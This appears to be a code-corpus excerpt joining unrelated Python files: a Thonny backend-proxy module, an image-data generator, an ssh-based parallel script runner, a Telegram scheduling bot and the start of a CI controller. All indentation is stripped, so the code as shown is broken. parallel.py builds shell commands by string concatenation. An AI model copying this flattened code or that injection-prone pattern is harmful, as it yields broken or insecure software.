def send_program_input(self, data):
self._send_msg(InputSubmission(data))
def _is_disconnected(self):
return self._proc is None or self._proc.poll() is not None
def get_sys_path(self):
return self._sys_path
def interrupt(self):
if self._proc is not None and self._proc.poll() is None:
if running_on_windows():
try:
os.kill(self._proc.pid, signal.CTRL_BREAK_EVENT) # @UndefinedVariable
except Exception:
logging.exception("Could not interrupt backend process")
else:
self._proc.send_signal(signal.SIGINT)
def destroy(self):
self._close_backend()
def _close_backend(self):
if self._proc is not None and self._proc.poll() is None:
self._proc.kill()
self._proc = None
self._response_queue = None
def _listen_stdout(self, stdout):
# debug("... started listening to stdout")
# will be called from separate thread
message_queue = self._response_queue
def publish_as_msg(data):
msg = parse_message(data)
if "cwd" in msg:
self.cwd = msg["cwd"]
message_queue.append(msg)
while len(message_queue) > 100:
# Probably backend runs an infinite/long print loop.
# Throttle message thougput in order to keep GUI thread responsive.
sleep(0.1)
while not self._is_disconnected():
data = stdout.readline()
# debug("... read some stdout data", repr(data))
if data == "":
break
else:
try:
publish_as_msg(data)
except Exception:
# Can mean the line was from subprocess,
# which can't be captured by stream faking.
# NB! If subprocess printed it without linebreak,
# then the suffix can be thonny message
parts = data.rsplit(common.MESSAGE_MARKER, maxsplit=1)
# print first part as it is
message_queue.append(
BackendEvent("ProgramOutput", data=parts[0], stream_name="stdout")
)
if len(parts) == 2:
second_part = common.MESSAGE_MARKER + parts[1]
try:
publish_as_msg(second_part)
except Exception:
# just print ...
message_queue.append(
BackendEvent(
"ProgramOutput", data=second_part, stream_name="stdout"
)
)
def _listen_stderr(self, stderr):
# stderr is used only for debugger debugging
while not self._is_disconnected():
data = stderr.readline()
if data == "":
break
else:
self._response_queue.append(
BackendEvent("ProgramOutput", stream_name="stderr", data=data)
)
def _store_state_info(self, msg):
if "cwd" in msg:
self._cwd = msg["cwd"]
if "welcome_text" in msg:
self._welcome_text = msg["welcome_text"]
if "in_venv" in msg:
self._in_venv = msg["in_venv"]
if "path" in msg:
self._sys_path = msg["path"]
if "usersitepackages" in msg:
self._usersitepackages = msg["usersitepackages"]
if "prefix" in msg:
self._sys_prefix = msg["prefix"]
if "exe_dirs" in msg:
self._exe_dirs = msg["exe_dirs"]
def get_supported_features(self):
return {"run"}
def get_site_packages(self):
# NB! site.sitepackages may not be present in virtualenv
for d in self._sys_path:
if ("site-packages" in d or "dist-packages" in d) and path_startswith(
d, self._sys_prefix
):
return d
return None
def get_user_site_packages(self):
return self._usersitepackages
def get_cwd(self):
return self._cwd
def get_exe_dirs(self):
return self._exe_dirs
def fetch_next_message(self):
if not self._response_queue or len(self._response_queue) == 0:
if self._is_disconnected():
raise BackendTerminatedError(self._proc.returncode if self._proc else None)
else:
return None
msg = self._response_queue.popleft()
self._store_state_info(msg)
if msg.event_type == "ProgramOutput":
# combine available small output messages to one single message,
# in order to put less pressure on UI code
while True:
if len(self._response_queue) == 0:
return msg
else:
next_msg = self._response_queue.popleft()
if (
next_msg.event_type == "ProgramOutput"
and next_msg["stream_name"] == msg["stream_name"]
and len(msg["data"]) + len(next_msg["data"]) <= OUTPUT_MERGE_THRESHOLD
and ("\n" not in msg["data"] or not io_animation_required)
):
msg["data"] += next_msg["data"]
else:
# not same type of message, put it back
self._response_queue.appendleft(next_msg)
return msg
else:
return msg
class CPythonProxy(SubprocessProxy):
"abstract class"
def __init__(self, clean: bool, executable: str) -> None:
super().__init__(clean, executable)
self._send_msg(ToplevelCommand("get_environment_info"))
def _get_initial_cwd(self):
return get_workbench().get_local_cwd()
def _get_launcher_with_args(self):
import thonny.backend_launcher
return [thonny.backend_launcher.__file__]
def _store_state_info(self, msg):
super()._store_state_info(msg)
if "gui_is_active" in msg:
self._update_gui_updating(msg)
def _clear_environment(self):
self._close_backend()
self._start_background_process()
def _close_backend(self):
self._cancel_gui_update_loop()
super()._close_backend()
def get_local_executable(self):
return self._executable
def _update_gui_updating(self, msg):
"""Enables running Tkinter or Qt programs which doesn't call mainloop.
When mainloop is omitted, then program can be interacted with
from the shell after it runs to the end.
Each ToplevelResponse is supposed to tell, whether gui is active
and needs updating.
"""
if not "gui_is_active" in msg:
return
if msg["gui_is_active"] and self._gui_update_loop_id is None:
# Start updating
self._loop_gui_update(True)
elif not msg["gui_is_active"] and self._gui_update_loop_id is not None:
self._cancel_gui_update_loop()
def _loop_gui_update(self, force=False):
if force or get_runner().is_waiting_toplevel_command():
self.send_command(InlineCommand("process_gui_events"))
self._gui_update_loop_id = get_workbench().after(50, self._loop_gui_update)
def _cancel_gui_update_loop(self):
if self._gui_update_loop_id is not None:
try:
get_workbench().after_cancel(self._gui_update_loop_id)
finally:
self._gui_update_loop_id = None
def run_script_in_terminal(self, script_path, args, interactive, keep_open):
cmd = [self._executable]
if interactive:
cmd.append("-i")
cmd.append(os.path.basename(script_path))
cmd.extend(args)
run_in_terminal(cmd, os.path.dirname(script_path), keep_open=keep_open)
def get_supported_features(self):
return {"run", "debug", "run_in_terminal", "pip_gui", "system_shell"}
class PrivateVenvCPythonProxy(CPythonProxy):
def __init__(self, clean):
self._prepare_private_venv()
super().__init__(clean, get_private_venv_executable())
def _prepare_private_venv(self):
path = get_private_venv_path()
if os.path.isdir(path) and os.path.isfile(os.path.join(path, "pyvenv.cfg")):
self._check_upgrade_private_venv(path)
else:
self._create_private_venv(
path, "Please wait!\nThonny prepares its virtual environment."
)
def _check_upgrade_private_venv(self, path):
# If home is wrong then regenerate
# If only micro version is different, then upgrade
info = _get_venv_info(path)
if not is_same_path(info["home"], os.path.dirname(sys.executable)):
self._create_private_venv(
path,
"Thonny's virtual environment was created for another interpreter.\n"
+ "Regenerating the virtual environment for current interpreter.\n"
+ "(You may need to reinstall your 3rd party packages)\n"
+ "Please wait!.",
clear=True,
)
else:
venv_version = tuple(map(int, info["version"].split(".")))
sys_version = sys.version_info[:3]
assert venv_version[0] == sys_version[0]
assert venv_version[1] == sys_version[1]
if venv_version[2] != sys_version[2]:
self._create_private_venv(
path, "Please wait!\nUpgrading Thonny's virtual environment.", upgrade=True
)
def _create_private_venv(self, path, description, clear=False, upgrade=False):
# Don't include system site packages
# This way all students will have similar configuration
# independently of system Python (if Thonny is used with system Python)
# NB! Cant run venv.create directly, because in Windows
# it tries to link venv to thonny.exe.
# Need to run it via proper python
args = ["-m", "venv"]
if clear:
args.append("--clear")
if upgrade:
args.append("--upgrade")
try:
# pylint: disable=unused-variable
import ensurepip # @UnusedImport
except ImportError:
args.append("--without-pip")
args.append(path)
proc = create_frontend_python_process(args)
from thonny.ui_utils import SubprocessDialog
dlg = SubprocessDialog(
get_workbench(), proc, "Preparing the backend", long_description=description
)
try:
ui_utils.show_dialog(dlg)
except Exception:
# if using --without-pip the dialog may close very quickly
# and for some reason wait_window would give error then
logging.exception("Problem with waiting for venv creation dialog")
get_workbench().become_active_window() # Otherwise focus may get stuck somewhere
bindir = os.path.dirname(get_private_venv_executable())
# create private env marker
marker_path = os.path.join(bindir, "is_private")
with open(marker_path, mode="w") as fp:
fp.write("# This file marks Thonny-private venv")
# Create recommended pip conf to get rid of list deprecation warning
# https://github.com/pypa/pip/issues/4058
pip_conf = "pip.ini" if running_on_windows() else "pip.conf"
with open(os.path.join(path, pip_conf), mode="w") as fp:
fp.write("[list]\nformat = columns")
assert os.path.isdir(path)
class SameAsFrontendCPythonProxy(CPythonProxy):
def __init__(self, clean):
super().__init__(clean, get_frontend_python())
def fetch_next_message(self):
msg = super().fetch_next_message()
if msg and "welcome_text" in msg:
if is_bundled_python(self._executable):
msg["welcome_text"] += " (bundled)"
else:
msg["welcome_text"] += " (" + self._executable + ")"
return msg
class CustomCPythonProxy(CPythonProxy):
def __init__(self, clean):
executable = get_workbench().get_option("CustomInterpreter.path")
# Rembember the usage of this non-default interpreter
used_interpreters = get_workbench().get_option("CustomInterpreter.used_paths")
if executable not in used_interpreters:
used_interpreters.append(executable)
get_workbench().set_option("CustomInterpreter.used_paths", used_interpreters)
super().__init__(clean, executable)
def fetch_next_message(self):
msg = super().fetch_next_message()
if msg and "welcome_text" in msg:
msg["welcome_text"] += " (" + self._executable + ")"
return msg
def get_private_venv_path():
if is_bundled_python(sys.executable.lower()):
prefix = "BundledPython"
else:
prefix = "Python"
return os.path.join(
THONNY_USER_DIR, prefix + "%d%d" % (sys.version_info[0], sys.version_info[1])
)
def get_private_venv_executable():
venv_path = get_private_venv_path()
if running_on_windows():
exe = os.path.join(venv_path, "Scripts", WINDOWS_EXE)
else:
exe = os.path.join(venv_path, "bin", "python3")
return exe
def _get_venv_info(venv_path):
cfg_path = os.path.join(venv_path, "pyvenv.cfg")
result = {}
with open(cfg_path, encoding="UTF-8") as fp:
for line in fp:
if "=" in line:
key, val = line.split("=", maxsplit=1)
result[key.strip()] = val.strip()
return result
def is_bundled_python(executable):
return os.path.exists(os.path.join(os.path.dirname(executable), "thonny_python.ini"))
def create_backend_python_process(
args, stdin=None, stdout=subprocess.PIPE, stderr=subprocess.STDOUT
):
"""Used for running helper commands (eg. pip) on CPython backend.
Assumes current backend is CPython."""
# TODO: if backend == frontend, then delegate to create_frontend_python_process
python_exe = get_runner().get_local_executable()
env = get_environment_for_python_subprocess(python_exe)
env["PYTHONIOENCODING"] = "utf-8"
env["PYTHONUNBUFFERED"] = "1"
# TODO: remove frontend python from path and add backend python to it
return _create_python_process(python_exe, args, stdin, stdout, stderr, env=env)
def create_frontend_python_process(
args, stdin=None, stdout=subprocess.PIPE, stderr=subprocess.STDOUT
):
"""Used for running helper commands (eg. for installing plug-ins on by the plug-ins)"""
python_exe = get_frontend_python().replace("pythonw.exe", "python.exe")
env = get_environment_for_python_subprocess(python_exe)
env["PYTHONIOENCODING"] = "utf-8"
env["PYTHONUNBUFFERED"] = "1"
return _create_python_process(python_exe, args, stdin, stdout, stderr)
def _create_python_process(
python_exe,
args,
stdin=None,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
shell=False,
env=None,
universal_newlines=True,
):
cmd = [python_exe] + args
if running_on_windows():
creationflags = subprocess.CREATE_NEW_PROCESS_GROUP
startupinfo = subprocess.STARTUPINFO()
startupinfo.dwFlags |= subprocess.STARTF_USESHOWWINDOW
else:
startupinfo = None
creationflags = 0
proc = subprocess.Popen(
cmd,
stdin=stdin,
stdout=stdout,
stderr=stderr,
shell=shell,
env=env,
universal_newlines=universal_newlines,
startupinfo=startupinfo,
creationflags=creationflags,
)
proc.cmd = cmd
return proc
class BackendTerminatedError(Exception):
def __init__(self, returncode=None):
Exception.__init__(self)
self.returncode = returncode
def get_frontend_python():
return sys.executable.replace("thonny.exe", "python.exe").replace("pythonw.exe", "python.exe")
def is_venv_interpreter_of_current_interpreter(executable):
for location in [".", ".."]:
cfg_path = os.path.join(location, "pyvenv.cfg")
if os.path.isfile(cfg_path):
with open(cfg_path) as fp:
content = fp.read()
for line in content.splitlines():
if line.replace(" ", "").startswith("home="):
_, home = line.split("=", maxsplit=1)
home = home.strip()
if os.path.isdir(home) and os.path.samefile(home, sys.prefix):
return True
return False
def get_environment_for_python_subprocess(target_executable):
overrides = get_environment_overrides_for_python_subprocess(target_executable)
return get_environment_with_overrides(overrides)
def get_environment_with_overrides(overrides):
env = os.environ.copy()
for key in overrides:
if overrides[key] is None and key in env:
del env[key]
else:
assert isinstance(overrides[key], str)
if key.upper() == "PATH":
update_system_path(env, overrides[key])
else:
env[key] = overrides[key]
return env
def get_environment_overrides_for_python_subprocess(target_executable):
"""Take care of not not confusing different interpreter
with variables meant for bundled interpreter"""
# At the moment I'm tweaking the environment only if current
# exe is bundled for Thonny.
# In remaining cases it is user's responsibility to avoid
# calling Thonny with environment which may be confusing for
# different Pythons called in a subprocess.
this_executable = sys.executable.replace("pythonw.exe", "python.exe")
target_executable = target_executable.replace("pythonw.exe", "python.exe")
interpreter_specific_keys = [
"TCL_LIBRARY",
"TK_LIBRARY",
"LD_LIBRARY_PATH",
"DYLD_LIBRARY_PATH",
"SSL_CERT_DIR",
"SSL_CERT_FILE",
"PYTHONHOME",
"PYTHONPATH",
"PYTHONNOUSERSITE",
"PYTHONUSERBASE",
]
result = {}
if os.path.samefile(
target_executable, this_executable
) or is_venv_interpreter_of_current_interpreter(target_executable):
# bring out some important variables so that they can
# be explicitly set in macOS Terminal
# (If they are set then it's most likely because current exe is in Thonny bundle)
for key in interpreter_specific_keys:
if key in os.environ:
result[key] = os.environ[key]
# never pass some variables to different interpreter
# (even if it's venv or symlink to current one)
if not is_same_path(target_executable, this_executable):
for key in ["PYTHONPATH", "PYTHONHOME", "PYTHONNOUSERSITE", "PYTHONUSERBASE"]:
if key in os.environ:
result[key] = None
else:
# interpreters are not related
# interpreter specific keys most likely would confuse other interpreter
for key in interpreter_specific_keys:
if key in os.environ:
result[key] = None
# some keys should be never passed
for key in [
"PYTHONSTARTUP",
"PYTHONBREAKPOINT",
"PYTHONDEBUG",
"PYTHONNOUSERSITE",
"PYTHONASYNCIODEBUG",
]:
if key in os.environ:
result[key] = None
# venv may not find (correct) Tk without assistance (eg. in Ubuntu)
if is_venv_interpreter_of_current_interpreter(target_executable):
try:
if "TCL_LIBRARY" not in os.environ or "TK_LIBRARY" not in os.environ:
result["TCL_LIBRARY"] = get_workbench().tk.exprstring("$tcl_library")
result["TK_LIBRARY"] = get_workbench().tk.exprstring("$tk_library")
except Exception:
logging.exception("Can't compute Tcl/Tk library location")
return result
def construct_cd_command(path):
return construct_cmd_line(["%cd", normpath_with_actual_case(path)])
_command_id_counter = 0
def generate_command_id():
global _command_id_counter
_command_id_counter += 1
return "cmd_" + str(_command_id_counter)
class BlockingDialog(CommonDialogEx):
def __init__(self, master, cmd, mode="indeterminate"):
super().__init__(master)
self.title(_("Working..."))
self.response = None
self._sent_interrupt = False
self._mode = mode
self._cmd_id = cmd["id"]
description = cmd.get("description", str(cmd))
self._description_label = ttk.Label(self.main_frame, text=description)
self._description_label.grid(row=0, column=0, padx=10, pady=10, sticky="new")
self._progress_bar = ttk.Progressbar(self.main_frame, mode=self._mode, length=200)
self._progress_bar.grid(row=1, column=0, padx=10, sticky="new")
self._progress_bar.start()
self._cancel_button = ttk.Button(self.main_frame, text=_("Cancel"), command=self._on_cancel)
self._cancel_button.grid(row=2, column=0, padx=10, pady=10)
self._start_time = time.time()
if isinstance(cmd, InlineCommand):
get_workbench().bind("InlineResponse", self._on_response, True)
get_workbench().bind("InlineProgress", self._on_progress, True)
else:
raise NotImplementedError()
def _on_response(self, event):
self.response = event
if event.get("command_id") == self._cmd_id:
self.destroy()
if event.get("error") and not event.get("interrupted"):
messagebox.showerror("Error", event.get("error"))
def _on_progress(self, event):
if event.get("command_id") != self._cmd_id:
return
if self._mode == "indeterminate":
self._progress_bar.stop()
self._mode = "determinate"
self._progress_bar.configure(mode=self._mode)
self._progress_bar.configure(maximum=event["maximum"], value=event["value"])
def _send_interrupt(self):
self._sent_interrupt = True
self._description_label.configure(text="Cancelling...")
self._cancel_button.configure(text=_("Close"))
get_runner()._cmd_interrupt()
def on_close(self, event=None):
self._on_cancel()
def _on_cancel(self):
if self._sent_interrupt:
if messagebox.askyesno(
"Interrupt again?",
"Do you want to close this dialog without waiting cancelling to complete?",
):
self.destroy()
else:
self._send_interrupt()
else:
if messagebox.askyesno(
"Cancel current operation?", "Do you really want to cancel this operation?"
):
self._send_interrupt()
|
gen.py | import re
import subprocess
import threading
from io import BytesIO
from math import ceil
from os import listdir, path
from sys import argv
import pandas as pd
from numpy import array
from PIL import Image
DATA_DIR = "data"
def run(num, wid, ims):
p = subprocess.Popen(
"php gen.php {}".format(num),
stdout=subprocess.PIPE,
stderr=subprocess.DEVNULL,
shell=True,
)
for i in range(num):
if i % 1024 == 0:
print(f"Worker{wid}: Generated{i}")
s = p.stdout.read(2)
ph = str(p.stdout.read(4), encoding="utf-8")
l = s[0] * 256 + s[1]
d = array(Image.open(BytesIO(p.stdout.read(l))))
ims.append((ph, d))
def generate(num, workers, batch_size):
each = num // workers
ims = [[] for i in range(workers)]
tasks = []
for i in range(workers - 1):
tasks.append(threading.Thread(target=run, args=(each, i, ims[i])))
tasks.append(
threading.Thread(
target=run, args=(num - each * (workers - 1), workers - 1, ims[-1])
)
)
for thread in tasks:
thread.start()
for thread in tasks:
thread.join()
df = pd.DataFrame([j for i in ims for j in i], columns=["label", "image"])
offset = max(
[
int((re.match(r"data-([0-9]+)\.pkl", f) or [None, -1])[1])
for f in listdir(DATA_DIR)
]
or [-1]
)
for i in range(ceil(len(df) / batch_size)):
df.iloc[i * batch_size : (i + 1) * batch_size].to_pickle(
path.join(DATA_DIR, f"data-{i + offset + 1}.pkl")
)
if __name__ == "__main__":
generate(*map(int, argv[1:]))
|
parallel.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Wed Sep 12 00:23:36 2018
@author: yuluo
"""
import multiprocessing as mp
import os
import random
import subprocess
from deprecated.deprecated import ProcessABC
class ParallelProcess(ProcessABC):
def __init__(self, content):
self.content = content
def get_computer_list(self):
return (self.content["cloudmesh"])["cluster"]
def get_computer(self, info):
item = ""
username = ""
publickey = ""
cluster = self.get_computer_list()
if info:
for i in cluster:
if (cluster[i])["label"] == info or (cluster[i])["name"] == info:
# print("computer "+ (cluster[i])["label"]+"/"+ (cluster[i])["name"]+ " is selected")
username = ((cluster[i])["credentials"])["username"]
publickey = ((cluster[i])["credentials"])["publickey"]
item = i
return item, username, publickey
else:
index = random.randint(0, len(cluster) - 1)
key = list(cluster.keys())[index]
# print("computer "+ (cluster[key])["label"]+"/"+ (cluster[key])["name"]+ " is selected")
username = ((cluster[key])["credentials"])["username"]
publickey = ((cluster[key])["credentials"])["publickey"]
item = key
return item, username, publickey
def run_remote(self, username, publickey, script):
s = subprocess.check_output(["ssh", "-i", publickey, username, "sh", script]).decode("utf-8").split("\n")
return s
def scp(self, username, publickey, script):
subprocess.check_output(["scp", "-i", publickey, script, username + ":~/"])
return "~/" + script.split("/")[len(script.split("/")) - 1]
def delete(self, username, publickey, file):
subprocess.check_output(["ssh", "-i", publickey, username, "rm", file])
def run_local(self, username, publickey, script):
proc = os.popen("cat " + script + " | " + "ssh" + " -i " + publickey + " " + username + " sh").read()
return proc
def parall_list(self, scripts):
count = len(scripts)
process = []
c_list = self.get_computer_list()
max_c = len(c_list)
if max_c >= count:
while count != 0:
cp = self.get_computer("")
if cp not in process:
count = count - 1
process.append(cp)
else:
rest = count % max_c
repeat = int(count / max_c)
while rest != 0:
cp = self.get_computer("")
if cp not in process:
rest = rest - 1
process.append(cp)
while repeat != 0:
for i in c_list.keys():
process.append(
[i, ((c_list[i])["credentials"])["username"], ((c_list[i])["credentials"])["publickey"]])
repeat = repeat - 1
return process
def run_parall(self, scripts):
output = mp.Queue()
parall_list = self.parall_list(scripts)
def parall_process(cp, output, script):
result = self.run_local(cp[1], cp[2], script)
output.put([cp[0], result])
process = [mp.Process(target=parall_process, args=(parall_list[x], output, scripts[x])) for x in
range(len(scripts))]
for i in process:
i.start()
for i in process:
i.join()
result = [output.get() for i in process]
return result
def readable(self, result):
for i in result:
print(i[0])
print("Running script and get the result:")
print(i[1])
|
main.py | # -*- coding: utf-8 -*-
from telebot import *
import datetime
from time import sleep
from dateutil import parser
import json
from threading import Thread
class Hide:
def __init__(self, text, title, id, **kwargs):
self.text = text
self.title = title
self.id = id
self.attribute = kwargs or None
def getText(self):
return self.text
def getTitle(self):
return self.title
def getId(self):
return self.id
class Post:
def __init__(self, text, hides, time, **kwargs):
self.text = text
self.hides = hides
self.time = time
self.attribute = kwargs or None
def getText(self):
return self.text
def getHides(self):
return self.hides
def getTime(self):
return self.time
class PostEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, Post) or isinstance(obj, Hide):
return obj.__dict__
if isinstance(obj, datetime.datetime):
return obj.strftime("%Y.%m.%d %H:%M")
return json.JSONEncoder.default(self, obj)
bot = telebot.TeleBot('') # Токен бота
chatId = 0 # Id канала для публикации
admin = "" # Ник администратора
posts = list()
planned = list()
adminStage = 0
currentText = ""
currentTime = datetime.datetime.now()
currentHides = list()
hidesMessage = 0
try:
f = open('data.json')
info = json.loads(f.read())
for post in info:
hides = list()
for hide in post["hides"]:
newHide = Hide(hide["text"], hide["title"], hide["id"])
hides.append(newHide)
newPost = Post(post["text"], hides, parser.parse(post["time"]))
posts.append(newPost)
except:
print("Parsing error")
currentTitle = ""
currentHideText = ""
@bot.message_handler(content_types=['text'])
def get_text_messages(message):
global adminStage, admin, posts, planned, hidesMessage
global currentText, currentHides, currentTime
global chatId
global currentTitle, currentHideText
if message.chat.type == "private" and message.from_user.username == admin:
if message.text == "/start" or message.text == "Отмена":
mm = types.ReplyKeyboardMarkup(row_width=2)
button = types.KeyboardButton("Создать новую запись")
mm.add(button)
button1 = types.KeyboardButton("История публикаций")
button2 = types.KeyboardButton("Отложенные посты")
mm.add(button1, button2)
bot.send_message(message.from_user.id, "Вас приветствует бот для публикации защищенных от парсинга сообщений.", reply_markup=mm)
adminStage = 0
elif message.text == "Создать новую запись":
mm = types.ReplyKeyboardMarkup(row_width=1)
button = types.KeyboardButton("Отмена")
mm.add(button)
bot.send_message(message.from_user.id, "Укажите текст публикуемой записи:", reply_markup=mm)
adminStage = 1
elif message.text == "История публикаций":
doc = open('log.txt', 'rb')
bot.send_document(message.chat.id, doc)
elif message.text == "Отложенные посты":
key = types.InlineKeyboardMarkup()
i = 0
for post in planned:
but = types.InlineKeyboardButton(text=post.getText(), callback_data="DeletePost_" + str(i))
key.add(but)
i += 1
bot.send_message(message.from_user.id, "Выберите пост для удаления:", reply_markup=key)
else:
if adminStage == 0:
bot.send_message(message.from_user.id, "Неизвестная команда")
elif adminStage == 1:
currentText = message.text
key = types.InlineKeyboardMarkup()
but = types.InlineKeyboardButton(text="Далее", callback_data="NextHide")
key.add(but)
but = types.InlineKeyboardButton(text="Добавить", callback_data="AddHide")
key.add(but)
hidesMessage = bot.send_message(message.from_user.id, "Измените прикрепленные к записи спойлеры:", reply_markup=key)
adminStage = 2
elif adminStage == 4:
datetime_object = parser.parse(message.text)
posts.append(Post(currentText, currentHides, datetime_object))
planned.append(posts[len(posts) - 1])
mm = types.ReplyKeyboardMarkup(row_width=2)
button = types.KeyboardButton("Создать новую запись")
mm.add(button)
button1 = types.KeyboardButton("История публикаций")
button2 = types.KeyboardButton("Отложенные посты")
mm.add(button1, button2)
saveData()
bot.send_message(message.chat.id, "Запись успешно запланирована", reply_markup=mm)
printer("Запланирована новая запись")
adminStage = 0
currentHides = list()
elif adminStage == 5:
currentTitle = message.text
bot.send_message(message.from_user.id, "Укажите отображаемый текст:")
adminStage = 6
elif adminStage == 6:
currentHideText = message.text
hide = Hide(currentHideText, currentTitle, str(len(posts)) + "_" + str(len(currentHides)))
currentHides.append(hide)
key = hidesMessage.reply_markup
but = types.InlineKeyboardButton(text=currentTitle, callback_data="editHide_" + hide.getId())
key.add(but)
hidesMessage = bot.edit_message_reply_markup(hidesMessage.chat.id, hidesMessage.message_id, reply_markup=key)
adminStage = 2
bot.send_message(message.from_user.id, "Спойлер успешно добавлен")
@bot.callback_query_handler(func=lambda c:True)
def inline(c):
global adminStage, admin, posts, hidesMessage
global currentText, currentHides, currentTime
global chatId
global planned
if c.data == "NextHide" and adminStage == 2:
key = types.InlineKeyboardMarkup()
but1 = types.InlineKeyboardButton(text="Да", callback_data="YesTime")
but2 = types.InlineKeyboardButton(text="Опубликовать сейчас", callback_data="NoTime")
key.add(but1, but2)
bot.send_message(c.message.chat.id, "Опубликовать запись в определенное время?", reply_markup=key)
adminStage = 3
if c.data == "AddHide" and adminStage == 2:
bot.send_message(c.message.chat.id, "Укажите заголовок спойлера:")
adminStage = 5
elif c.data == "YesTime" and adminStage == 3:
bot.send_message(c.message.chat.id, "Укажите время публикации в формате dd.mm.yyyy hh:mm:")
adminStage = 4
elif c.data == "NoTime" and adminStage == 3:
posts.append(Post(currentText, currentHides, datetime.datetime.now()))
key = types.InlineKeyboardMarkup()
for hide in currentHides:
but = types.InlineKeyboardButton(text=hide.getTitle(), callback_data="showHide_" + hide.getId())
key.add(but)
bot.send_message(chatId, currentText, reply_markup=key)
mm = types.ReplyKeyboardMarkup(row_width=2)
button = types.KeyboardButton("Создать новую запись")
mm.add(button)
button1 = types.KeyboardButton("История публикаций")
button2 = types.KeyboardButton("Отложенные посты")
mm.add(button1, button2)
saveData()
currentHides = list()
bot.send_message(c.message.chat.id, "Запись успешно опубликована", reply_markup=mm)
printer("Опубликована новая запись")
adminStage = 0
elif str(c.data).startswith("editHide_"):
newHides = list()
key = types.InlineKeyboardMarkup()
but = types.InlineKeyboardButton(text="Далее", callback_data="NextHide")
key.add(but)
but = types.InlineKeyboardButton(text="Добавить", callback_data="AddHide")
key.add(but)
for hide in currentHides:
if "editHide_" + hide.getId() != str(c.data):
newHides.append(hide)
but = types.InlineKeyboardButton(text=hide.getTitle(), callback_data="editHide_" + hide.getId())
key.add(but)
currentHides = newHides
hidesMessage = bot.edit_message_reply_markup(hidesMessage.chat.id, hidesMessage.message_id, reply_markup=key)
bot.send_message(c.message.chat.id, "Спойлер успешно удален")
elif str(c.data).startswith("showHide_"):
data = str(c.data).split("_")
first = int(data[1])
second = int(data[2])
bot.answer_callback_query(callback_query_id=c.id, text=posts[first].getHides()[second].getText(), show_alert=True)
elif str(c.data).startswith("DeletePost_"):
data = str(c.data).split("_")
index = int(data[1])
posts.remove(planned[index])
planned.remove(planned[index])
bot.send_message(c.message.chat.id, "Запись успешно удалена")
printer("Удалена запланированная запись")
def saveData():
f = open('data.json', 'w')
f.write(json.dumps(posts, indent=4, cls=PostEncoder))
printer("Данные о постах записаны в файл")
def checkPlanned(*args, **kwargs):
while True:
global planned
for post in planned:
time = post.getTime()
if datetime.datetime.now() >= time:
key = types.InlineKeyboardMarkup()
for hide in post.getHides():
but = types.InlineKeyboardButton(text=hide.getTitle(), callback_data="showHide_" + hide.getId())
key.add(but)
bot.send_message(chatId, currentText, reply_markup=key)
printer("Опубликована новая запись")
planned.remove(post)
sleep(1)
def printer(printing):
log_file = open("log.txt", "a")
log_file.write("[" + str(datetime.datetime.now()) + "] " + str(printing) + '\n')
log_file.close()
return printer
th = Thread(target=checkPlanned, args=())
th.start()
bot.polling(none_stop=True, interval=0)
|
controllers.py | """maintains all functionality related running virtual machines, starting and tracking tests."""
import datetime
import hashlib
import json
import os
import shutil
import sys
from multiprocessing import Process
from typing import Any
import requests
from flask import (Blueprint, abort, flash, g, jsonify, redirect, request,
url_for)
from git import GitCommandError, InvalidGitRepositoryError, Repo
from github import ApiError, GitHub
from lxml import etree
from lxml.etree import Element
from markdown2 import markdown
from pymysql.err import IntegrityError
from sqlalchemy import and_, func, or_
from sqlalchemy.sql import label
from sqlalchemy.sql.functions import count
from werkzeug.utils import secure_filename
from decorators import get_menu_entries, template_renderer
from mailer import Mailer
from mod_auth.controllers import check_access_rights, login_required
from mod_auth.models import Role
from mod_ci.forms import AddUsersToBlacklist, RemoveUsersFromBlacklist
from mod_ci.models import BlockedUsers, Kvm, MaintenanceMode
from mod_customized.models import CustomizedTest
from mod_deploy.controllers import is_valid_signature, request_from_github
from mod_home.models import CCExtractorVersion, GeneralData
from mod_regression.models import (Category, RegressionTest,
RegressionTestOutput,
regressionTestLinkTable)
from mod_sample.models import Issue
from mod_test.models import (Fork, Test, TestPlatform, TestProgress,
TestResult, TestResultFile, TestStatus, TestType)
if sys.platform.startswith("linux"):
import libvirt
mod_ci = Blueprint('ci', __name__)
class Status:
"""Define different states for the tests."""
PENDING = "pending"
SUCCESS = "success"
ERROR = "error"
FAILURE = "failure"
@mod_ci.before_app_request
def before_app_request() -> None:
"""Organize menu content such as Platform management before request."""
config_entries = get_menu_entries(
g.user, 'Platform mgmt', 'cog', [], '', [
{'title': 'Maintenance', 'icon': 'wrench',
'route': 'ci.show_maintenance', 'access': [Role.admin]}, # type: ignore
{'title': 'Blocked Users', 'icon': 'ban',
'route': 'ci.blocked_users', 'access': [Role.admin]} # type: ignore
]
)
if 'config' in g.menu_entries and 'entries' in config_entries:
g.menu_entries['config']['entries'] = config_entries['entries'] + g.menu_entries['config']['entries']
else:
g.menu_entries['config'] = config_entries
def start_platforms(db, repository, delay=None, platform=None) -> None:
"""
Start new test on both platforms in parallel.
We use multiprocessing module which bypasses Python GIL to make use of multiple cores of the processor.
"""
from run import config, log, app
with app.app_context():
from flask import current_app
if platform is None or platform == TestPlatform.linux:
linux_kvm_name = config.get('KVM_LINUX_NAME', '')
log.info('Define process to run Linux VM')
linux_process = Process(target=kvm_processor, args=(current_app._get_current_object(), db, linux_kvm_name,
TestPlatform.linux, repository, delay,))
linux_process.start()
log.info('Linux VM process kicked off')
if platform is None or platform == TestPlatform.windows:
win_kvm_name = config.get('KVM_WINDOWS_NAME', '')
log.info('Define process to run Windows VM')
windows_process = Process(target=kvm_processor, args=(current_app._get_current_object(), db, win_kvm_name,
TestPlatform.windows, repository, delay,))
windows_process.start()
log.info('Windows VM process kicked off')
def kvm_processor(app, db, kvm_name, platform, repository, delay) -> None:
"""
Check whether there is no already running same kvm.
Checks whether machine is in maintenance mode or not
Launch kvm if not used by any other test
Creates testing xml files to test the change in main repo.
Creates clone with separate branch and merge pr into it.
:param app: The Flask app
:type app: Flask
:param db: database connection
:type db: sqlalchemy.orm.scoped_session
:param kvm_name: name for the kvm
:type kvm_name: str
:param platform: operating system
:type platform: str
:param repository: repository to run tests on
:type repository: str
:param delay: time delay after which to start kvm processor
:type delay: int
"""
from run import config, log, get_github_config
github_config = get_github_config(config)
log.info(f"[{platform}] Running kvm_processor")
if kvm_name == "":
log.critical(f'[{platform}] KVM name is empty!')
return
if delay is not None:
import time
log.debug(f'[{platform}] Sleeping for {delay} seconds')
time.sleep(delay)
